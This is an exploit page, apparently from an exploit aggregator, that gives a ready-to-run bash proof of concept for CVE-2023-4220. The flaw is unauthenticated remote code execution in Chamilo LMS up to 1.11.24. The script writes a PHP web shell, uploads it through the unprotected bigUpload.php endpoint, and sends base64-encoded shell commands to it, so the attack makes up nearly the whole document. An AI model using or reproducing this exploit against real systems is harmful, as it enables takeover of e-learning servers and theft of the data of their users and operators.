Share
## https://sploitus.com/exploit?id=DFE9BBDB-BA64-57BE-ABCA-8364EBDD9116
#################################
CVE-2023-4220 RCE Chamilo 1.11.24
#################################

| https://starlabs.sg/advisories/23/23-4220/
|
| Chamilo LMS <= 1.11.24 (Beersel	31/08/2023)
| Unauthenticated File Remote Code Execution on "Big Upload" lib
|
| Identify version : /documentation/changelog.html
|
| POC EXPLOIT CVE RCE VULN
|

.. code-block:: bash

  #!/bin/bash
  HOST='http://lms.domain.com'
  CMD='id'
  
  URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
  URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'
  
  cat <<'EOF'>/tmp/rce.php
  <?php
  $a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
  ?>
  EOF
  
  curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD"
  CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
  curl "$HOST/$URL_FILE?aoOoy=$CMD"

|